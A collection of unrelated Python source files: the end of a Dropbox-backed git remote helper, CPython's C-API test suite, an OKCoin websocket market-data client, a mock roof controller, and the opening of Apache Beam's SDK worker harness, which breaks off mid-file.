output_queue.put(Poison('exception while downloading: %s' % e))
def _fetch(self, sha):
"""
Recursively fetch the given object and the objects it references.
"""
# have multiple threads downloading in parallel
queue = [sha]
pending = set()
downloaded = set()
input_queue = multiprocessing.Queue() # requesting downloads
output_queue = multiprocessing.Queue() # completed downloads
procs = []
for _ in range(self._processes):
target = Binder(self, '_download')
args = (input_queue, output_queue)
# use multiprocessing.dummy to use threads instead of processes
proc = multiprocessing.dummy.Process(target=target, args=args)
proc.daemon = True
proc.start()
procs.append(proc)
self._trace('', level=Level.INFO, exact=True) # for showing progress
done = total = 0
while queue or pending:
if queue:
# if possible, queue up download
sha = queue.pop()
if sha in downloaded or sha in pending:
continue
if git_object_exists(sha):
if not git_history_exists(sha):
# this can only happen in the case of aborted fetches
# that are resumed later
self._trace('missing part of history from %s' % sha)
queue.extend(git_referenced_objects(sha))
else:
self._trace('%s already downloaded' % sha)
else:
pending.add(sha)
input_queue.put(sha)
else:
# process completed download
res = output_queue.get()
if isinstance(res, Poison):
self._fatal(res.message)
pending.remove(res)
downloaded.add(res)
queue.extend(git_referenced_objects(res))
# show progress
done = len(downloaded)
total = done + len(pending)
pct = float(done) / total
message = '\rReceiving objects: {:4.0%} ({}/{})'.format(pct, done, total)
self._trace(message, level=Level.INFO, exact=True)
self._trace('\rReceiving objects: 100% ({}/{}), done.\n'.format(done, total),
level=Level.INFO, exact=True)
for proc in procs:
input_queue.put(Poison())
for proc in procs:
proc.join()
def _write_ref(self, new_sha, dst, force=False):
"""
Atomically update the given reference to point to the given object.
Return None if there is no error, otherwise return a description of the
error.
"""
path = self._ref_path(dst)
if force:
# overwrite regardless of what is there before
mode = dropbox.files.WriteMode('overwrite')
else:
info = self._refs.get(dst, None)
if info:
rev, sha = info
if not git_object_exists(sha):
return 'fetch first'
is_fast_forward = git_is_ancestor(sha, new_sha)
if not is_fast_forward and not force:
return 'non-fast forward'
# perform an atomic compare-and-swap
mode = dropbox.files.WriteMode.update(rev)
else:
# perform an atomic add, which fails if a concurrent writer
# writes before this does
mode = dropbox.files.WriteMode('add')
self._trace('writing ref %s with mode %s' % (dst, mode))
data = ('%s\n' % new_sha).encode('utf8')
try:
self._connection().files_upload(data, path, mode, mute=True)
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.UploadError):
raise
return 'fetch first'
else:
return None
def _get_refs(self, for_push):
"""
Return the refs present on the remote.
"""
try:
loc = posixpath.join(self._path, 'refs')
res = self._connection().files_list_folder(loc, recursive=True)
files = res.entries
while res.has_more:
res = self._connection().files_list_folder_continue(res.cursor)
files.extend(res.entries)
except dropbox.exceptions.ApiError as e:
if not isinstance(e.error, dropbox.files.ListFolderError):
raise
if not for_push:
# if we're pushing, it's okay if nothing exists beforehand,
# but it's good to notify the user just in case
self._trace('repository is empty', Level.INFO)
return []
refs = []
for ref_file in files:
if not isinstance(ref_file, dropbox.files.FileMetadata):
continue
path = ref_file.path_lower
name = self._ref_name_from_path(path)
rev, data = self._get_file(path)
sha = data.decode('utf8').strip()
self._refs[name] = (rev, sha)
refs.append('%s %s' % (sha, name))
return refs
class Config(object):
"""
A class to manage configuration data.
"""
def __init__(self, filename):
with open(filename) as f:
self._settings = json.load(f)
def __getitem__(self, key):
"""
Return the setting corresponding to key.
Raises KeyError if the config file is missing the key.
"""
return self._settings[key]
def main():
# configure system
stdout_to_binary()
url = sys.argv[2]
# urls are one of:
# dropbox:///path/to/repo
# dropbox://username@/path/to/repo
# dropbox://:token@/path/to/repo
url = urlparse(url)
if url.scheme != 'dropbox':
stderr('error: URL must start with the "dropbox://" scheme\n')
exit(1)
if url.netloc:
if not url.username and not url.password:
# user probably put in something like "dropbox://path/to/repo"
# missing the third "/"
stderr('error: URL with no username or token must start with "dropbox:///"\n')
exit(1)
if url.username and url.password:
# user supplied both username and token
stderr('error: URL must not specify both username and token\n')
exit(1)
path = url.path.lower() # dropbox is case insensitive, so we must canonicalize
if path.endswith('/'):
stderr('error: URL path must not have trailing slash\n')
exit(1)
config_files = [
os.path.join(os.environ.get('XDG_CONFIG_HOME',
os.path.expanduser('~/.config')),
'git',
'git-remote-dropbox.json'),
os.path.expanduser('~/.git-remote-dropbox.json'),
]
config = None
for config_file in config_files:
try:
config = Config(config_file)
except ValueError:
stderr('error: malformed config file: %s\n' % config_file)
exit(1)
except IOError:
continue
else:
break
if not config:
stderr('error: missing config file: %s\n' % config_files[0])
exit(1)
try:
if url.password:
token = url.password
elif not url.username:
token = config['default']
else:
token = config[url.username]
except KeyError:
token_name = url.username or 'default'
stderr('error: config file missing token for key "%s"\n' % token_name)
exit(1)
helper = Helper(token, path)
try:
helper.run()
except Exception:
if helper.verbosity >= Level.DEBUG:
raise # re-raise exception so it prints out a stack trace
else:
stderr('error: unexpected exception (run with -v for details)\n')
exit(1)
except KeyboardInterrupt:
# exit silently with an error code
exit(1)
if __name__ == '__main__':
main()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'During handling of the above exception, '
br'another exception occurred:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
here = os.path.abspath(__file__)
basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Programs")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out, err
def test_subinterps(self):
# This is just a "don't crash" test
out, err = self.run_embedded_interpreter()
if support.verbose:
print()
print(out)
print(err)
@staticmethod
def _get_default_pipe_encoding():
rp, wp = os.pipe()
try:
with os.fdopen(wp, 'w') as w:
default_pipe_encoding = w.encoding
finally:
os.close(rp)
return default_pipe_encoding
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
out, err = self.run_embedded_interpreter("forced_io_encoding")
if support.verbose:
print()
print(out)
print(err)
expected_errors = sys.__stdout__.errors
expected_stdin_encoding = sys.__stdin__.encoding
expected_pipe_encoding = self._get_default_pipe_encoding()
expected_output = '\n'.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {in_encoding}:{errors}",
"stdout: {out_encoding}:{errors}",
"stderr: {out_encoding}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: ignore",
"stdin: {in_encoding}:ignore",
"stdout: {out_encoding}:ignore",
"stderr: {out_encoding}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:{errors}",
"stdout: latin-1:{errors}",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: replace",
"stdin: latin-1:replace",
"stdout: latin-1:replace",
"stderr: latin-1:backslashreplace"])
expected_output = expected_output.format(
in_encoding=expected_stdin_encoding,
out_encoding=expected_pipe_encoding,
errors=expected_errors)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
# (note: the format string must be bytes!)
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format.encode("ascii"), keywords)
when_not_skipped = False
except SystemError as e:
s = "argument 1 (impossible<bad format char>)"
when_not_skipped = (str(e) == s)
except TypeError:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format.encode("ascii"), keywords)
when_skipped = False
except SystemError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# parse_tuple_and_keywords error handling tests
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
okcoin.py
|
# Import Built-Ins
import logging
import json
import threading
import time
# Import Third-Party
from websocket import create_connection, WebSocketTimeoutException
import requests
# Import Homebrew
from bitex.api.WSS.base import WSSAPI
# Init Logging Facilities
log = logging.getLogger(__name__)
class OKCoinWSS(WSSAPI):
def __init__(self):
super(OKCoinWSS, self).__init__('wss://real.okcoin.com:10440/websocket/okcoinapi ',
'OKCoin')
self.conn = None
self.pairs = ['BTC', 'LTC']
self._data_thread = None
def start(self):
super(OKCoinWSS, self).start()
self._data_thread = threading.Thread(target=self._process_data)
self._data_thread.daemon = True
self._data_thread.start()
def stop(self):
super(OKCoinWSS, self).stop()
self._data_thread.join()
def _process_data(self):
self.conn = create_connection(self.addr, timeout=4)
for pair in self.pairs:
payload = [{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_ticker' % pair},
{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_depth_60' % pair},
{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_trades' % pair},
{'event': 'addChannel',
'channel': 'ok_sub_spotusd_%s_kline_1min' % pair}]
log.debug(payload)
self.conn.send(json.dumps(payload))
while self.running:
try:
data = json.loads(self.conn.recv())
except (WebSocketTimeoutException, ConnectionResetError):
self._controller_q.put('restart')
if 'data' in data:
pair = ''.join(data['channel'].split('spot')[1].split('_')[:2]).upper()
self.data_q.put((data['channel'], pair, data['data'],
time.time()))
else:
log.debug(data)
self.conn = None
|
roof_control.py
|
from threading import Thread
from time import sleep
from components.roof_control import RoofControl
class MockRoofControl(RoofControl):
def __init__(self):
super().__init__()
self.roof_open_switch.pin.drive_high()
self.roof_closed_switch.pin.drive_low()
def open(self):
self.roof_open_switch.pin.drive_high()
self.roof_closed_switch.pin.drive_high()
t = Thread(target=self.__wait_for_open__, args=(self.roof_open_switch.pin,))
t.start()
super().open()
t.join()
return True
def close(self):
self.roof_open_switch.pin.drive_high()
self.roof_closed_switch.pin.drive_high()
t = Thread(target=self.__wait_for_open__, args=(self.roof_closed_switch.pin,))
t.start()
super().close()
t.join()
return True
def __wait_for_open__(self, pin):
sleep(10)
pin.drive_low()
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
SCHEDULING_DELAY_THRESHOLD_SEC = 5*60 # 5 Minutes
def __init__(
self, control_address, worker_count, credentials=None, worker_id=None,
profiler_factory=None):
self._alive = True
self._worker_count = worker_count
self._worker_index = 0
self._worker_id = worker_id
if credentials is None:
logging.info('Creating insecure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.insecure_channel(
control_address)
else:
logging.info('Creating secure control channel for %s.', control_address)
self._control_channel = GRPCChannelFactory.secure_channel(
control_address, credentials)
grpc.channel_ready_future(self._control_channel).result(timeout=60)
logging.info('Control channel established.')
self._control_channel = grpc.intercept_channel(
self._control_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_factory = data_plane.GrpcClientDataChannelFactory(
credentials, self._worker_id)
self._state_handler_factory = GrpcStateHandlerFactory(credentials)
self._profiler_factory = profiler_factory
self._fns = {}
# BundleProcessor cache across all workers.
self._bundle_processor_cache = BundleProcessorCache(
state_handler_factory=self._state_handler_factory,
data_channel_factory=self._data_channel_factory,
fns=self._fns)
# workers for process/finalize bundle.
self.workers = queue.Queue()
# one worker for progress/split request.
self.progress_worker = SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory)
# one thread is enough for getting the progress report.
# Assumption:
# Progress report generation should not do IO or wait on other resources.
# Without wait, having multiple threads will not improve performance and
# will only add complexity.
self._progress_thread_pool = futures.ThreadPoolExecutor(max_workers=1)
# finalize and process share one thread pool.
self._process_thread_pool = futures.ThreadPoolExecutor(
max_workers=self._worker_count)
self._responses = queue.Queue()
self._process_bundle_queue = queue.Queue()
self._unscheduled_process_bundle = {}
logging.info('Initializing SDKHarness with %s workers.', self._worker_count)
def run(self):
control_stub = beam_fn_api_pb2_grpc.BeamFnControlStub(self._control_channel)
no_more_work = object()
# Create process workers
for _ in range(self._worker_count):
# SdkHarness manage function registration and share self._fns with all
# the workers. This is needed because function registration (register)
# and exceution(process_bundle) are send over different request and we
# do not really know which woker is going to process bundle
# for a function till we get process_bundle request. Moreover
# same function is reused by different process bundle calls and
# potentially get executed by different worker. Hence we need a
# centralized function list shared among all the workers.
self.workers.put(
SdkWorker(self._bundle_processor_cache,
profiler_factory=self._profiler_factory))
def get_responses():
while True:
response = self._responses.get()
if response is no_more_work:
return
yield response
self._alive = True
monitoring_thread = threading.Thread(name='SdkHarness_monitor',
target=self._monitor_process_bundle)
monitoring_thread.daemon = True
monitoring_thread.start()
try:
for work_request in control_stub.Control(get_responses()):
logging.debug('Got work %s', work_request.instruction_id)
request_type = work_request.WhichOneof('request')
# Name spacing the request method with 'request_'. The called method
# will be like self.request_register(request)
getattr(self, SdkHarness.REQUEST_METHOD_PREFIX + request_type)(
work_request)
finally:
self._alive = False
logging.info('No more requests from control plane')
logging.info('SDK Harness waiting for in-flight requests to complete')
# Wait until existing requests are processed.
self._progress_thread_pool.shutdown()
self._process_thread_pool.shutdown()
# get_responses may be blocked on responses.get(), but we need to return
# control to its caller.
self._responses.put(no_more_work)
# Stop all the workers and clean all the associated resources
self._data_channel_factory.close()
self._state_handler_factory.close()
logging.info('Done consuming work.')
def _execute(self, task, request):
try:
response = task()
except Exception: # pylint: disable=broad-except
traceback_string = traceback.format_exc()
print(traceback_string, file=sys.stderr)
logging.error(
'Error processing instruction %s. Original traceback is\n%s\n',
request.instruction_id, traceback_string)
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id, error=traceback_string)
self._responses.put(response)
def _request_register(self, request):
def task():
for process_bundle_descriptor in getattr(
request, request.WhichOneof('request')).process_bundle_descriptor:
self._fns[process_bundle_descriptor.id] = process_bundle_descriptor
return beam_fn_api_pb2.InstructionResponse(
instruction_id=request.instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
